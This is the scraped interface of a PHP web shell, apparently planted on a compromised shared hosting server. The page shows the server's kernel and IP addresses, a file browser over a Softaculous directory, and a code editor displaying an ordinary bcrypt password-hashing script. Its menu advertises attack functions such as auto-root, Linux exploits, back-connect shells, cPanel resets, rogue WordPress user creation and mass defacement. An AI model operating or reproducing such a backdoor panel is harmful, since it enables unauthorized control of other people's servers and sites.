Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 13.58.121.29
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
myt /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
365
B
-rw-r--r--
clone.php
5.8
KB
-rw-r--r--
edit.php
5.3
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
108
B
-rw-r--r--
import.php
3.24
KB
-rw-r--r--
info.xml
3.7
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
13.13
KB
-rw-r--r--
install.xml
1.22
KB
-rw-r--r--
main.php
4.05
KB
-rw-r--r--
md5
1.82
KB
-rw-r--r--
params.inc
10
B
-rw-r--r--
update_pass.php
4.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php $resp = __hashPassword('[[admin_pass]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __hashPassword($password,$cost=13){ global $error; __checkBlowfish(); $salt=__generateSalt($cost); $hash=crypt($password,$salt); if(!is_string($hash) || (function_exists('mb_strlen') ? mb_strlen($hash, '8bit') : strlen($hash))<32) $error[] = 'Internal error while generating hash.'; return $hash; } function __checkBlowfish(){ global $error; if(!function_exists('crypt')){ $error[] = 'requires the PHP crypt() function. This system does not have it.'; } if(!defined('CRYPT_BLOWFISH') || !CRYPT_BLOWFISH){ $error[] = 'requires the Blowfish option of the PHP crypt() function. This system does not have it.'; } } function __generateSalt($cost=13){ global $error; if(($random=__generateRandomString(22,true))===false) if(($random=__generateRandomString(22,false))===false) $error[] = 'Unable to generate random string.'; return sprintf('$2y$%02d$',$cost).strtr($random,array('_'=>'.','~'=>'/')); } function __generateRandomString($length,$cryptographicallyStrong=true){ if(($randomBytes=__generateRandomBytes($length+2,$cryptographicallyStrong))!==false) return strtr(substr(base64_encode($randomBytes),0,$length),array('+'=>'_','/'=>'~')); return false; } function __generateRandomBytes($length,$cryptographicallyStrong=true){ $bytes=''; if(function_exists('openssl_random_pseudo_bytes')) { $bytes=openssl_random_pseudo_bytes($length,$strong); if(strlen($bytes)>=$length && ($strong || !$cryptographicallyStrong)) return substr($bytes,0,$length); } if(function_exists('mcrypt_create_iv') && ($bytes=mcrypt_create_iv($length, MCRYPT_DEV_URANDOM))!==false && strlen($bytes)>=$length) { return substr($bytes,0,$length); } if(($file=@fopen('/dev/urandom','rb'))!==false && ($bytes=@fread($file,$length))!==false && (fclose($file) || true) && strlen($bytes)>=$length) { return substr($bytes,0,$length); } $i=0; while(strlen($bytes)<$length && ($byte=__generateSessionRandomBlock())!==false && ++$i<3) { $bytes.=$byte; } if(strlen($bytes)>=$length) return substr($bytes,0,$length); if ($cryptographicallyStrong) return false; while(strlen($bytes)<$length) $bytes.=__generatePseudoRandomBlock(); return substr($bytes,0,$length); } function __generateSessionRandomBlock(){ ini_set('session.entropy_length',20); if(ini_get('session.entropy_length')!=20) return false; // These calls are (supposed to be, according to PHP manual) safe even if // there is already an active session for the calling script. @session_start(); @session_regenerate_id(); $bytes=session_id(); if(!$bytes) return false; // $bytes has 20 bytes of entropy but the session manager converts the binary // random bytes into something readable. We have to convert that back. // SHA-1 should do it without losing entropy. return sha1($bytes,true); } function __generatePseudoRandomBlock(){ $bytes=''; if (function_exists('openssl_random_pseudo_bytes') && ($bytes=openssl_random_pseudo_bytes(512))!==false && strlen($bytes)>=512) { return substr($bytes,0,512); } for($i=0;$i<32;++$i) $bytes.=pack('S',mt_rand(0,0xffff)); // On UNIX and UNIX-like operating systems the numerical values in `ps`, `uptime` and `iostat` // ought to be fairly unpredictable. Gather the non-zero digits from those. foreach(array('ps','uptime','iostat') as $command) { @exec($command,$commandResult,$retVal); if(is_array($commandResult) && !empty($commandResult) && $retVal==0) $bytes.=preg_replace('/[^1-9]/','',implode('',$commandResult)); } // Gather the current time's microsecond part. Note: this is only a source of entropy on // the first call! If multiple calls are made, the entropy is only as much as the // randomness in the time between calls. $bytes.=substr(microtime(),2,6); // Concatenate everything gathered, mix it with sha512. hash() is part of PHP core and // enabled by default but it can be disabled at compile time but we ignore that possibility here. return hash('sha512',$bytes,true); } @unlink('update_pass.php'); ?>
Close
